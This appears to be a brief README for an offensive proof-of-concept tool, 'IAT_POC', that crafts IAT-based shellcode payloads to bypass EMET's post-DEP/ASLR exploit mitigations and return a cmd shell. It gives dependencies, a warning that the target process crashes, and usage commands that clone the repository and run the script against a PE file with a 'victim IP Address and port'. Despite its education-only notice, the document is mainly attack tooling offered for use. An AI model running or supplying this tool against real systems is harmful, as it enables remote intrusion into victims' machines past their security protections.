Notice: this tool and post are for education, learning and research purposes only!
IAT_POC: find a suitable IAT-based payload that bypasses the post-DEP/ASLR protections in EMET.
Dependencies:
+ Python 2.7.x
+ pefile
Warning:
There is no exit function: you will get a cmd shell back, but the process will crash afterwards. This was done by design; write your own exit function.
Use:

```
git clone https://github.com/ShellcodeSmuggler/IAT_POC && cd IAT_POC
./iat_poc.py <your PE File> <your victim IP Address and port> win10 True True
```